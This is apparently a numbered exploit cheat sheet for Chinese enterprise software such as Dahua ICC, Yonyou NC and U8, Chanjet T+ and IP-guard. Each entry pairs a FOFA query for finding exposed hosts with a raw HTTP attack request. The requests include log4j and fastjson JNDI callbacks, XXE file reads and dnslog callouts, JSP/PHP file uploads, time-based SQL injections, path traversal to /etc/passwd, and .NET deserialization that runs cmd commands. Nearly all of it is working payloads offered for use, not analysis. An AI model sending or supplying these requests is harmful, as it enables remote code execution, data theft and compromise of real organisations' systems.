The body is a fastjson DNS-callback probe; replace the dnslog domain with your own callback host.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}


24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart管理平台 importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3 and is executed as-is by the exportexcelbysql action.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The filename query parameter (including its .jsp extension) is used verbatim as the name of the written file; the request body becomes its content.
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
The page parameter of the bundled FlexPaper view.php is interpolated into a shell command; || chains an echo that writes a marker file next to view.php.
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the marker file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
